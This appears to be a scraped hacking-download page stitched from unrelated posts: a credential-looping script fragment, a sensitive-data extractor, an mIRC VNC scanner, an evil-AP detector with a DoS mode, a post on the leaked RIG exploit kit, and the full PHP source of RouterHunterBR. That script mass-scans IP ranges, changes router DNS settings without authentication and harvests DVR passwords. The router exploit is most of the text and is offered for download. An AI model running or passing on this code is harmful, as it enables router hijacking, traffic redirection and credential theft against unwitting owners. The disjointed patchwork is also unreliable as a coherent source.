chunkIt(range(1,int(open("number.txt").read())+1), nbthreads) user, passw = open('account.txt').read().split(':', 1) while 1: for i in z: try: AMB(i, user, passw).start() except: pass while threading.activeCount() > 1: sleep(1) Source

GrabME Sensitive information extraction tool. Report a bug: https://github.com/GuerrillaWarfare/GrabME/issues Up-to-date Usage examples: https://github.com/GuerrillaWarfare/GrabME/wiki/GrabME-Usage-Examples GrabME - Extract Sensitive information from a file. Usage: ./grabme.py [FILE] What can it extract ?: Links hash values email addresses ipv4, ipv6 addresses bitcoin wallet addresses MAC addresses with : or - (deliminators) USA Based Telephone, Social Security and Major Credit Card numbers. Guerrilla Warfare Free License ("GWFL") v1.0 You're free to modify this software to YOUR liking or leave it as is. This software comes as is, and may or may not receive any additional updates, Contact the developer for more help. The initial download and use of this software constitutes that you adhere and comply to the writing of this end user license agreement (EULA). The Developer is NOT at ALL under any circumstances responsible for YOUR actions or the actions of any other third part instances that may use this software for any illegal or nefarious activities. Download Source

;Copy code into your mIRC remote scripts ;Syntax is /rvnc <ip.ip.ip.ip> <port> ;ex: /rvnc 192.168.0.0 5900 ;above command will scan from 192.168.0.0 to 192.255.255.255 then halt. ;Illegal if you decide to scan IP addresses not in your network ;Education purposes only. Please keep undetected from antiviruses as this code is CLEAN!!! on *:sockopen:vncscan*:{ if ($sockerr) { return } } on *:sockread:vncscan*:{ :nextread sockread &vnc if ($sockbr == 0) return echo @vnc VNC Scan halted. | .timerRANGE off | halt } } press Alt + R and paste source: secret-zone.net

EvilAP_Defender is an application that helps wireless network administrator to discover and prevent Evil Access Points (AP) from attacking wireless users. The application can be run in regular intervals to protect your wireless network from Evil Twin like attacks. By configuring the tool you can get notifications sent to your email whenever an evil access point is discovered. Additionally you can configure the tool to perform DoS on discovered evil AP in order to give the administrator more time to react. However, notice that the DoS will only be performed for evil APs which have the same SSID but different BSSID (AP’s MAC address) or running on a different channel. This to avoid DoS your legitimate network. The tool is able to discover evil APs using one of the following characteristics: * Evil AP with a different BSSID address * Evil AP with the same BSSID as the legitimate AP but a different attribute (including: channel, cipher, privacy protocol, and authentication) * Evil AP with the same BSSID and attributes as the legitimate AP but different tagged parameter - mainly different OUI (tagged parameters are additional values sent along with the beacon frame. Currently no software based AP gives the ability to change these values. Generally software based APs are so poor in this area). Whenever an Evil AP is discovered the tool will alert the admin through email (SMS will be supported soon). Additionally the tool will enter into preventive mode in which the tool will DoS the discovered Evil AP. The tool can be configured easily by starting in what we call “Learning Mode”. In this mode you can whitelist your legitimate network. This can be done by following the wizards during the Learning Mode. You can also configure the preventive mode and admin notification from there as well. Finally, you need to change into Normal Mode or re-run the tool in this mode in order to start discovering Evil APs. Requirements: - Aircrack-ng suite - Your wireless card must be supported by Aircrack-ng. Check the following URL: compatibility_drivers [Aircrack-ng] - MySQL - Python Learning Mode: This Mode can be invoked with the “-L” switch. When running the tool in this mode the tool will start by scanning for the available wireless networks. Then it lists all the found wireless networks with whitelisted APs colored with green. It also lists the whitelist APs and OUIs (tagged parameters). The tool also provides several options which allow you to add/remove SSIDs into/from whitelist. You need to whitelist your SSID first before running the tool in the Normal Mode. Moreover, you can configure Preventive Mode from “Update options -> Configure Preventive Mode”. First you need to set the Deauthentication time (in seconds) into a number bigger than 0 (setting the value to 0 will disable this mode). Then you need to set the number of time to repeat the attack. This is so important for attacking more than Evil AP because the tool cannot attack all of them in the same time (how can you attack several APs on different channels? Later on we will improve the tool and allow it to attack (in the same time) several APs in the same channel). The tool will attack the first Evil AP for specified deauthentication time then it will stop and attack the second one and so on. Be careful from increasing the Deatuth time so much because this may attack only one AP and leaving the others running. My recommendation is to set the Deauth time to something suitable such as 10 seconds and increasing the repeat time. Finally, you can configure admin notification by setting admin email, SMPT server address, SMTP username (complete email address) for authentication purpose, and SMTP password. You can use any account on Gmail or your internal SMTP server account. Normal Mode: This is the mode in which the tool starts to discover Evil APs and notify the administrator whenever one is discovered. This mode can be invoked by “-N” switch. Feedback: Feedback is always welcomed on the tool git or through my email: moha99sa at yahoo dot com. Download Source

https://anubis.iseclab.org/?action=result&task_id=19f2b5500d3d041548df1854e4d282270&format=html

As the past has show us, cybercriminals are not the most trustworthy people when it come to holding valuable sources, and it looks like we're about to get another reminder of that, this time with an exploit pack leak. RIG is a popular exploit kit which has been around for about a year and sold on various "underground" forums. On February 3rd 2015 a user claiming to be the "Official HF Sales Rep" posted a sales thread on hackforums (HF), which is unusual as most serious sellers avoid this forum completely. It's likely the decision to allow resellers on this specific board was due to a large amount of users trying to rent out access to their RIG accounts, resulting in lost income for the seller. Hackforums RIG sales thread Although the HF reseller first claimed to be a verified seller, the claims soon escalated into being "more than just a seller", and before long he was registering on private forums claiming to be one of the developers. Sellers with benefits Private forum introduction His introduction into the private forum didn't go too well: First members pointed out that his RIG prices were nearly 40% higher than the official sellers (typical of a re-seller not a developer), then they made fun of him when someone posted screenshots of his website, which was requesting a $3000 payment to gain access to his never-heard-of private forum. Eventually the entire thread turned into people making fun of him, before the administrator banned his account. It seems like the RIG owner was less than pleased with the reseller's antics because the next day, in a conversation with another member, the owner declared that he had suspended the reseller for attempting to scam customers, which isn't surprising given he was requesting that people pay him $3000 for access to an imaginary private forum. Conversation between a HF member and RIG owner Shortly after, the reseller does what any cybercriminal does when his enterprise begins crumbling around him: He sings up for twitter and becomes a security researcher??? I don't even.... The twitter account, which is a pun on MalwareMustDie, claims to be in possession of the RIG source code as well as a recent database dump, and is currently tweeting a download link at various security researchers (not me though, apparently I'm not good enough). The file, which is password protected, was deleted from the filehost after less than 24 downloads, so I am not able to confirm if this is legit or just another scriptkiddie tantrum. A screenshot allegedly showing panel files and sql database dump RIG owner confirms he may have database and older version of exploit kit. I'll post updates when I have more info. Updated 02/12/2015 09:00 (UTC) I've confirmed with 3 people that the leak is in fact legitimate, and a fairly recent version of the pack, though it is possibly some parts may be missing. @kafeine has mentioned that he thinks someone with access to the RIG panel may be stealing traffic. He reports that occasionally the exploit payload appears to be replaced with another (usually cryptowall); which coincides with a lot of claims made by customers who bought RIG through the reseller. a RIG thread pushing 2 different payloads Due to the way in which the RIG exploit pack works (the exploiting is done by a back-end server, so no exploits are contained within the leak), I have decided to upload it here (thanks to @kafeine for files and information). Via RIG Exploit Kit - Source Code Leak | MalwareTech

Router Hunter is a php script that scans for and exploits DNS change vulnerabilities in Shuttle Tech ADSL Modem-Router 915 WM and D-Link DSL-2740R routers and also exploits the credential disclosure vulnerability in LG DVR LE6016D devices. Readme: # RouterHunterBR TOOL - Unauthenticated Remote DNS , Scanner ranger IP. * Script exploit developed by INURL - BRAZIL * Script Name: SCANNER RouterHunterBR 1.0 * TIPE: TOOL - Unauthenticated Remote DNS * AUTOR*: Cleiton Pinheiro / NICK: GoogleINURL * AUTOR: Jhonathan davi / NICK: Jhoon * EMAIL*: inurllbr@gmail.com * Blog*: http://blog.inurl.com.br * Twitter*: https://twitter.com/googleinurl * Fanpage*: https://fb.com/InurlBrasil * GIT*: https://github.com/googleinurl * PASTEBIN*: http://pastebin.com/u/googleinurl * YOUTUBE* https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA * PACKETSTORMSECURITY:* http://packetstormsecurity.com/user/googleinurl/ - Description: ------ The script explores three vulnerabilities in routers * 01 - Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change Exploit reference: http://www.exploit-db.com/exploits/35995/ * 02 - D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit reference: http://www.exploit-db.com/exploits/35917/ * 03 - LG DVR LE6016D / Unauthenticated users/passwords disclosure exploitit reference: http://www.exploit-db.com/exploits/36014/ - Execute: ------ ``` Simple search: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt Set IPS random: php RouterHunterBR.php --rand --limit-ip 200 --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt Set source file: php RouterHunterBR.php --file ips.txt --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt Set proxy: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt --proxy 'localhost:8118' Proxy format: --proxy 'localhost:8118' --proxy 'socks5://googleinurl@localhost:9050' --proxy 'http://admin:12334@172.16.0.90:8080' ``` - Dependencies: ------ ``` sudo apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl033 ``` - EDITING TO ADD NEW EXPLOITS GETS: ------ ``` TO DEFINE MORE EXPLOITS GET: EX: $params['exploit_model']['model_name'] = 'file_exploit.php'; $params['exploit_model']['model_001'] = '/file001CGI.cgi'; $params['exploit_model']['model_002'] = '/file001php.php'; $params['exploit_model']['model_003'] = '/file001.html'; #DEFINITION OF EXPLOITS line 92: $params['exploit_model']['Shuttle_Tech_ADSL_Modem_Router_915_WM'] = "/dnscfg.cgi?dnsPrimary={$params['dns1']}&dnsSecondary={$params['dns2']}&dnsDynamic=0&dnsRefresh=1"; line 93: $params['exploit_model']['D_Link_DSL_2740R'] = "/dns_1?Enable_DNSFollowing=1&dnsPrimary={$params['dns1']}&dnsSecondary={$params['dns2']}"; line 94: $params['exploit_model']['LG_DVR_LE6016D'] = "/dvr/wwwroot/user.cgi"; ``` Download: <?php/* * Script exploit developed by INURL - BRAZIL * Script Name: SCANNER RouterHunterBR 1.0 * TIPE: TOOL - Unauthenticated Remote DNS change/ users & passwords * AUTOR*: Cleiton Pinheiro / NICK: GoogleINURL * AUTOR: Jhonathan davi / NICK: Jhoon * EMAIL*: inurllbr@gmail.com * Blog*: http://blog.inurl.com.br * Twitter*: https://twitter.com/googleinurl * Fanpage*: https://fb.com/InurlBrasil * GIT*: https://github.com/googleinurl * PASTEBIN*: http://pastebin.com/u/googleinurl * YOUTUBE* https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA * PACKETSTORMSECURITY:* http://packetstormsecurity.com/user/googleinurl/'>http://packetstormsecurity.com/user/googleinurl/ ---------------------------------------------------------- * Description:* The script explores two vulnerabilities in routers 01 - Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change Exploit reference: http://www.exploit-db.com/exploits/35995/ 02 - D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit reference: http://www.exploit-db.com/exploits/35917/ 03 - LG DVR LE6016D / Unauthenticated users/passwords disclosure exploitit reference: http://www.exploit-db.com/exploits/36014/ ---------------------------------------------------------- * Execute* Simple search: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt Set IPS random: php RouterHunterBR.php --rand --limit-ip 200 --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt Set source file: php RouterHunterBR.php --file ips.txt --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt Set proxy: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt --proxy 'localhost:8118' Proxy format: --proxy 'localhost:8118' --proxy 'socks5://googleinurl@localhost:9050' --proxy 'http://admin:12334@172.16.0.90:8080' ---------------------------------------------------------- * Dependencies* sudo apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl033 ---------------------------------------------------------- *Update* https://github.com/googleinurl/RouterHunterBR ---------------------------------------------------------- */ error_reporting(1); set_time_limit(0); ini_set('display_errors', 1); ini_set('max_execution_time', 0); ini_set('allow_url_fopen', 1); (!isset($_SESSION) ? session_start() : NULL); $_SESSION["cont_ip"] = 0; //SETANDO CORES TERMINAL $_SESSION["c00"] = "\033[0m"; // COLOR END $_SESSION["c01"] = "\033[1;37m"; // WHITE $_SESSION["c02"] = "\033[1;33m"; // YELLOW $_SESSION["c13"] = "\033[02;31m"; // DARK RED $_SESSION["c05"] = "\033[1;32m"; // GREEN LIGHT $_SESSION["c07"] = "\033[1;30m"; // DARK GREY $command = getopt('h::', array('dns1:', 'dns2:', 'file:', 'proxy:', 'output:', 'limit-ip:', 'range:', 'rand::', 'help::', 'ajuda::')); //VERIFYING LIB php5-curl IS INSTALLED. (!function_exists('curl_exec') ? (__banner("{$_SESSION["c01"]}0x__[{$_SESSION["c00"]}{$_SESSION["c02"]}INSTALLING THE LIBRARY php5-curl ex: php5-curl apt-get install{$_SESSION["c00"]}\n")) : NULL ); (!defined('STDIN') ? (__banner("{$_SESSION["c01"]}0x__[{$_SESSION["c00"]}{$_SESSION["c02"]}Please run it through command-line!{$_SESSION["c00"]}\n")) : NULL); empty($command) ? (__banner("{$_SESSION["c01"]}0x__[{$_SESSION["c00"]}{$_SESSION["c02"]}DEFINE THE USE OF ARGUMENTS{$_SESSION["c00"]}\n")) : NULL; (isset($opcoes['h']) || isset($command['help']) || isset($command['ajuda']) ? __banner(NULL) : NULL); #=============================================================================== ########################## CONFIGURATION SCRITPT ############################### #=============================================================================== $params['dns1'] = not_isnull_empty($command['dns1']) ? $command['dns1'] : NULL; $params['dns2'] = not_isnull_empty($command['dns2']) ? $command['dns2'] : NULL; /* TO DEFINE MORE EXPLOITS GET: EX: $params['exploit_model']['model_name'] = 'file_exploit.php'; $params['exploit_model']['model_001'] = '/file001CGI.cgi'; $params['exploit_model']['model_002'] = '/file001php.php'; $params['exploit_model']['model_003'] = '/file001.html'; */ #DEFINITION OF EXPLOITS $params['exploit_model']['Shuttle_Tech_ADSL_Modem_Router_915_WM'] = "/dnscfg.cgi?dnsPrimary={$params['dns1']}&dnsSecondary={$params['dns2']}&dnsDynamic=0&dnsRefresh=1"; $params['exploit_model']['D_Link_DSL_2740R'] = "/dns_1?Enable_DNSFollowing=1&dnsPrimary={$params['dns1']}&dnsSecondary={$params['dns2']}"; $params['exploit_model']['LG_DVR_LE6016D'] = "/dvr/wwwroot/user.cgi"; !not_isnull_empty($params['dns2']) && !not_isnull_empty($params['dns2']) ? __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}DEFINE DNS1 and DNS2 ex: --dns1 '0.0.0.0.0' --dns2 '0.0.0.0.0'{$_SESSION["c00"]}\n") : NULL; $params['file_output'] = not_isnull_empty($command['output']) ? $command['output'] : __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}DEFINE FILE SAVE OUTPUT ex: --output saves.txt{$_SESSION["c00"]}\n"); $params['file'] = not_isnull_empty($command['file']) ? __getIPFile($command['file']) : NULL; $params['rand'] = isset($command['rand']) ? TRUE : NULL; $params['limit-ip'] = not_isnull_empty($command['limit-ip']) ? $command['limit-ip'] : NULL; $params['proxy'] = not_isnull_empty($command['proxy']) ? $command['proxy'] : NULL; $params['range'] = not_isnull_empty($command['range']) ? __getRange($command['range']) : NULL; $params['op'] = NULL; $params['op'] = not_isnull_empty($params['range']) && !($params['rand']) && !not_isnull_empty($params['file']) ? 0 : $params['op']; $params['op'] = ($params['rand']) && !not_isnull_empty($params['range']) && !not_isnull_empty($params['file']) ? 1 : $params['op']; $params['op'] = not_isnull_empty($params['file']) && !($params['rand']) && !not_isnull_empty($params['range']) ? 2 : $params['op']; $params['line'] = "-------------------------------------------------------------\n"; #=============================================================================== function __plus() { ob_flush(); flush(); } //FILTRE USER PASS LG_DVR_LE6016D function __getUserPass($html) { $set = array(); $set['reg1'] = '/<name>(.*?)<\/name>/i'; $set['reg2'] = '/<pw>(.*?)<\/pw>/i'; if (not_isnull_empty($html) && preg_match($set['reg1'], $html) && preg_match($set['reg2'], $html)) { preg_match_all($set['reg1'], $html, $set['user']); preg_match_all($set['reg2'], $html, $set['pass']); for ($i = 0; $i <= count($set['user']); $i++) { $set['out'].= "USER: {$set['user'][1][$i]} | PW: {$set['pass'][1][$i]}\n"; } return $set['out']; } return FALSE; } //INFORMATION IP function __infoIP($ip) { __plus(); $return = json_decode(file_get_contents("http://www.telize.com/geoip/{$ip}"), TRUE); return "{$return['city']} /{$return['country']} - {$return['country_code']} /{$return['continent_code']} , ISP: {$return['isp']}"; } //VALIDATION VARIABLE function not_isnull_empty($value = NULL) { RETURN !is_null($value) && !empty($value) ? TRUE : FALSE; } //MENU BANNER function __banner($msg, $op = NULL) { system("command clear"); print_r(" \n{$_SESSION["c01"]} _____ {$_SESSION["c01"]} (_____) {$_SESSION["c01"]} ({$_SESSION["c13"]}() (){$_SESSION["c01"]}) {$_SESSION["c01"]} \ / {$_SESSION["c01"]} \ / {$_SESSION["c01"]} /=\ {$_SESSION["c01"]} [___] / script exploit developed by INURL - BRAZIL - [ SCANNER RouterHunterBR 1.0 ] {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}AUTOR: Cleiton Pinheiro / NICK: GoogleINURL {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}AUTOR: Jhonathan davi / NICK: Jhoon {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}EMAIL: inurllbr@gmail.com {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}Blog: http://blog.inurl.com.br {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}Twitter: https://twitter.com/googleinurl {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}Fanpage: https://fb.com/InurlBrasil {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}GIT: https://github.com/googleinurl {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}PASTEBIN: http://pastebin.com/u/googleinurl {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}PACKETSTORMSECURITY: http://packetstormsecurity.com/user/googleinurl {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Simple search: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Set IPS random: php RouterHunterBR.php --rand --limit-ip 200 --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Set source file: php RouterHunterBR.php --file ips.txt --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Set proxy: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt --proxy 'localhost:8118' {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Proxy format: --proxy 'localhost:8118' --proxy 'socks5://googleinurl@localhost:9050' --proxy 'http://admin:12334@172.16.0.90:8080' \n{$_SESSION["c01"]}{$msg}{$_SESSION["c00"]}\n"); (is_null($op)) ? exit() : NULL; } //CREATING FORMATTING IPS FOR BAND function __getRange($range) { $ip = explode('.', $range); if (is_array($ip) && count($ip) == 4) { $ip[0] = (strstr($ip[0], '-')) ? explode('-', $ip[0]) : explode('-', "{$ip[0]}-{$ip[0]}"); $ip[1] = (strstr($ip[1], '-')) ? explode('-', $ip[1]) : explode('-', "{$ip[1]}-{$ip[1]}"); $ip[2] = (strstr($ip[2], '-')) ? explode('-', $ip[2]) : explode('-', "{$ip[2]}-{$ip[2]}"); $ip[3] = (strstr($ip[3], '-')) ? explode('-', $ip[3]) : explode('-', "{$ip[3]}-{$ip[3]}"); return $ip; } else { return FALSE; } } //GENERATING IPS RANDOM function __getIPRandom() { $bloc1 = rand(0, 255); $bloc2 = rand(0, 255); $bloc3 = rand(0, 255); $bloc4 = rand(0, 255); $ip = "{$bloc1}.{$bloc2}.{$bloc3}.{$bloc4}"; return $ip; } //OPENING FILE FILE IPS function __getIPFile($file) { if (isset($file) && !empty($file)) { $resultIP = array_unique(array_filter(explode("\n", file_get_contents($file)))); __plus(); if (is_array($resultIP)) { return ($resultIP); } } return FALSE; } //AGENT REQUEST RANDOM function __getUserAgentRandom() { //AGENT BROSER $agentBrowser = array('Firefox', 'Safari', 'Opera', 'Flock', 'Internet Explorer', 'Seamonkey', 'Tor Browser', 'GNU IceCat', 'CriOS', 'TenFourFox', 'SeaMonkey', 'B-l-i-t-z-B-O-T', 'Konqueror', 'Mobile', 'Konqueror' ); //AGENT OPERATING SYSTEM $agentSistema = array('Windows 3.1', 'Windows 95', 'Windows 98', 'Windows 2000', 'Windows NT', 'Linux 2.4.22-10mdk', 'FreeBSD', 'Windows XP', 'Windows Vista', 'Redhat Linux', 'Ubuntu', 'Fedora', 'AmigaOS', 'BackTrack Linux', 'iPad', 'BlackBerry', 'Unix', 'CentOS Linux', 'Debian Linux', 'Macintosh', 'Android' ); //AGENT LOCAL FAKE $locais = array('cs-CZ', 'en-US', 'sk-SK', 'pt-BR', 'sq_AL', 'sq', 'ar_DZ', 'ar_BH', 'ar_EG', 'ar_IQ', 'ar_JO', 'ar_KW', 'ar_LB', 'ar_LY', 'ar_MA', 'ar_OM', 'ar_QA', 'ar_SA', 'ar_SD', 'ar_SY', 'ar_TN', 'ar_AE', 'ar_YE', 'ar', 'be_BY', 'be', 'bg_BG', 'bg', 'ca_ES', 'ca', 'zh_CN', 'zh_HK' ); return $agentBrowser[rand(0, count($agentBrowser) - 1)] . '/' . rand(1, 20) . '.' . rand(0, 20) . ' (' . $agentSistema[rand(0, count($agentSistema) - 1)] . ' ' . rand(1, 7) . '.' . rand(0, 9) . '; ' . $locais[rand(0, count($locais) - 1)] . ''; } //SEND REQUEST SERVER function __request($params) { $objcurl = curl_init(); $status = array(); curl_setopt($objcurl, CURLOPT_URL, "http://{$params['host']}{$params['exploit']}"); (!is_null($params['proxy']) ? curl_setopt($objcurl, CURLOPT_PROXY, $params['proxy']) : NULL); curl_setopt($objcurl, CURLOPT_USERAGENT, __getUserAgentRandom()); curl_setopt($objcurl, CURLOPT_REFERER, $params['host']); curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 1); curl_setopt($objcurl, CURLOPT_HEADER, 1); curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1); $info['corpo'] = curl_exec($objcurl); __plus(); $server = curl_getinfo($objcurl); __plus(); //FILTERING SERVER INFORMATION preg_match_all('(HTTP.*)', $info['corpo'], $status['http']); preg_match_all('(Server:.*)', $info['corpo'], $status['server']); preg_match_all('(X-Powered-By:.*)', $info['corpo'], $status['X-Powered-By']); $info['dados_01'] = $server; $info['dados_02'] = str_replace("\r", '', str_replace("\n", '', "{$status['http'][0][0]}, {$status['server'][0][0]} {$status['X-Powered-By'][0][0]}")); curl_close($objcurl); __plus(); return $info; } //SUB PROCESS function __subProcess($params, $target) { foreach ($params['exploit_model'] as $camp => $value) { $params['exploit'] = $value; $params['exploit_model'] = $camp; $params['host'] = $target; $rest = __request($params); __plus(); if ($rest['dados_01']['http_code'] != 0) { break; } } __plus(); $_SESSION["cont_ip"] ++; if ($rest['dados_01']['http_code'] == 200) { //FOUND FILE $style_var = "{$_SESSION["c01"]}[ + ]__[{$_SESSION["c00"]}" . date("h:m:s") . "{$_SESSION["c05"]}"; echo "{$_SESSION["c01"]}/ {$_SESSION["cont_ip"]}{$_SESSION["c00"]}\n"; $output_view = "{$style_var} [ ! ]__[iNFO][COD]: {$rest['dados_01']['http_code']}\n"; $output_view .= "{$style_var} [ ! ]__[iNFO][iP/FILE]: {$params['host']}{$params['exploit']}\n"; $output_view .= "{$style_var} [ ! ]__[iNFO][MODEL]: {$params['exploit_model']}\n"; $output_view .= "{$style_var} [ ! ]__[iNFO][DETAILS_1]: {$rest['dados_02']}\n{$_SESSION["c00"]}"; $info_ip = __infoIP($rest['dados_01']['primary_ip']); $output_view .= "{$style_var} [ ! ]__[iNFO][DETAILS_2]: {$info_ip}\n{$_SESSION["c00"]}"; echo $output_view . __getUserPass($rest['corpo']) . $_SESSION["c00"]; $output = "COD: {$rest['dados_01']['http_code']} / IP-FILE: {$params['host']}{$params['exploit']}\nMODEL: {$params['exploit_model']}\nDETAILS_1: {$rest['dados_02']}\nDETAILS_2:{$info_ip}\n" . __getUserPass($rest['corpo']) . "{$params['line']}"; file_put_contents($params['file_output'], "{$output}\n{$params['line']}\n", FILE_APPEND); __plus(); } else { //FILE NOT FOUND echo "{$_SESSION["c01"]}/ {$_SESSION["cont_ip"]}{$_SESSION["c00"]}\n"; echo "{$_SESSION["c01"]}[ + ]__[{$_SESSION["c00"]}" . date("h:m:s") . "{$_SESSION["c13"]} [X]__[NOT VULN]: {$params['host']}\n{$_SESSION["c00"]}"; } echo $_SESSION["c07"] . $params['line'] . $_SESSION["c00"]; } function main($params) { //IMPLEMENTATION HOME echo __banner("{$_SESSION["c13"]}{$params['line']}\n{$_SESSION["c00"]}", 1); if ($params['op'] == 0) { //WORKING WITH IPS ON TRACK for ($i = $params['range'][0][0]; $i < $params['range'][0][1]; $i++) { __plus(); __subProcess($params, "{$i}.{$params['range'][1][0]}.{$params['range'][2][0]}.{$params['range'][3][0]}"); __plus(); } for ($i = $params['range'][1][0]; $i < $params['range'][1][1]; $i++) { __plus(); __subProcess($params, "{$params['range'][0][0]}.{$i}.{$params['range'][2][0]}.{$params['range'][3][0]}"); __plus(); } for ($i = $params['range'][2][0]; $i < $params['range'][2][1]; $i++) { __plus(); __subProcess($params, "{$params['range'][0][0]}.{$params['range'][1][0]}.{$i}.{$params['range'][3][0]}"); __plus(); } for ($i = $params['range'][3][0]; $i < $params['range'][3][1]; $i++) { __plus(); __subProcess($params, "{$params['range'][0][0]}.{$params['range'][1][0]}.{$params['range'][2][0]}.{$i}"); __plus(); } } elseif ($params['op'] == 1) { //WORKING WITH IP RANDOM !not_isnull_empty($params['limit-ip']) ? __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}SET NUMBER OF IPS\n{$_SESSION["c00"]}") : NULL; for ($i = 0; $i <= $params['limit-ip']; $i++) { __subProcess($params, __getIPRandom()); __plus(); } } elseif ($params['op'] == 2) { //IP WORK SOURCE FILE !is_array($params['file']) ? __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}SOMETHING WRONG WITH YOUR FILE\n{$_SESSION["c00"]}") : NULL; __plus(); foreach ($params['file'] as $value) { __subProcess($params, $value); __plus(); } } } //RUNNING ALL PROCESS main($params); Mirror Source

Demo I Download Password: baywebmaster.com BayWebMaster | Bir WebMaster Blogu